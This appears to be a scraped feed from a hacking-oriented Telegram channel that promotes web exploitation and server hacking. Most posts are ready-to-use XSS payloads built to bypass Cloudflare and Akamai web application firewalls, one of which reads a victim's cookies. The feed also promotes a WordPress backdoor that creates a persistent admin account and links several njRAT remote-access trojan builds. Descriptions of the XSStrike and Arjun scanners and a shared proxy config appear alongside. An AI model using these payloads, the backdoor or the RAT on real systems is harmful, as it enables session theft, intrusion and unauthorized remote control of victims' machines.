0Day.Today | Learn Exploit | Zero World | Dark web |
18.6K subscribers
1.21K photos
116 videos
487 files
1.24K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
ابزار Shuck ابزاری برای کرک hash با دیتابیس HIBP

Shuck.sh

#hash
——————‌
0Day.Today
@LearnExploit
@Tech_Army
71👍1🔥1
🌟 XSStrike 🌟

Advanced XSS Detection Suite

📝
XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.

Instead of injecting payloads and checking it works like all the other tools do, XSStrike analyses the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine. Here are some examples of the payloads generated by XSStrike:
}]};(confirm)()//\
<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z
</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//

Apart from that, XSStrike has crawling, fuzzing, parameter discovery, WAF detection capabilities as well. It also scans for DOM XSS vulnerabilities.

Main Features
⚪️Reflected and DOM XSS scanning
⚪️Multi-threaded crawling
⚪️Context analysis
⚪️Configurable core
⚪️WAF detection & evasion
⚪️Outdated JS lib scanning
⚪️Intelligent payload generator
⚪️Handmade HTML & JavaScript parser
⚪️Powerful fuzzing engine
⚪️Blind XSS support
⚪️Highly researched work-flow
⚪️Complete HTTP support
⚪️Bruteforce payloads from a file
⚪️Payload Encoding

⬇️ Download
😸 Github

bugcod3

#XSS #Scanner #Exploit #Python

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
👍92❤‍🔥1
Xss Bypass Waf

&lt;details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//

#bypass #waf
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍10👎1
🌟 Arjun 🌟

HTTP Parameter Discovery Suite

👁 What's Arjun?

Arjun can find query parameters for URL endpoints. If you don't get what that means, it's okay, read along.

Web applications use parameters (or queries) to accept user input, take the following example into consideration

http://api.example.com/v1/userinfo?id=751634589

This URL seems to load user information for a specific user id, but what if there exists a parameter named admin which when set to True makes the endpoint provide more information about the user?
This is what Arjun does, it finds valid HTTP parameters with a huge default dictionary of 25,890 parameter names.

The best part? It takes less than 10 seconds to go through this huge list while making just 50-60 requests to the target. Here's how

Why Arjun?
🔻Supports GET/POST/POST-JSON/POST-XML requests
🔻Automatically handles rate limits and timeouts
🔻Export results to: BurpSuite, text or JSON file
🔻Import targets from: BurpSuite, text file or a raw request file
🔻Can passively extract parameters from JS or 3 external sources


◀️ Installing Arjun
You can install arjun with pip as following:

➜ ~ pip3 install arjun

or, by downloading this repository and running

➜ ~ python3 setup.py install

⬇️ Download
😸 Github

BugCod3

#Recon #Api #Testing #Fuzzer #Fuzzing

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥4👎1
CloudFlare WAF bypass payload

<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;

#WAF #bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥72👍2
complete deep web course

Download

#Download
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3👍3
An Akamai WAF bypass payload

%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22

#Waf #bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍91
Reverse Engineering and exploit development

Download

#Download
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥82
بکدور ساخت یوزر ادمین با دسترسی دائم

Link File

#backdoor #wordpress

imem!

——————‌
0Day.Today
@LearnExploit
@Tech_Army
112🔥2
RXSS

'"&gt;&lt;svg+onload=alert(document.domain)&gt;

#Rxss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥7👍41
Akamai Kona WAF

1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>


#XSS #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
4👍43🔥1
vless://733297c1-5be1-4595-92c3-d49f8e69a867@s.thisisforu.sbs:43978?alpn=#GR_SV5_MCI_MTN-Telegram%20channel%20%253A%20%2540LearnExploit

بزنید حال کنید بمولا 🔥
20 گیگ زدم تموم شد بازم میفرستم براتون

——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥8👍3
Ty all for 8K🔥
🔥14
🌟 njRAT 🌟

📝
NjRAT is a Remote Administration Tool. This repository contains a Njrat Editions.

Use it on virtual machine

⬇️ Download (NjRat 0.7D Danger Edition)
⬇️ Download (NjRat 0.7D Golden Edition)
⬇️ Download (NjRat 0.7D Green Edition)
⬇️ Download (NjRat 0.7D)
⬇️ Download (njRAT Lime Edition )

⬇️ Download (ALL Version)
🐈‍⬛ Github

BugCod3
#njRAT #Tools

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
👍51🔥1
An Akamai WAF bypass payload

1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>


#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥3👍1
A payload to bypass WAF

<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//


#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥4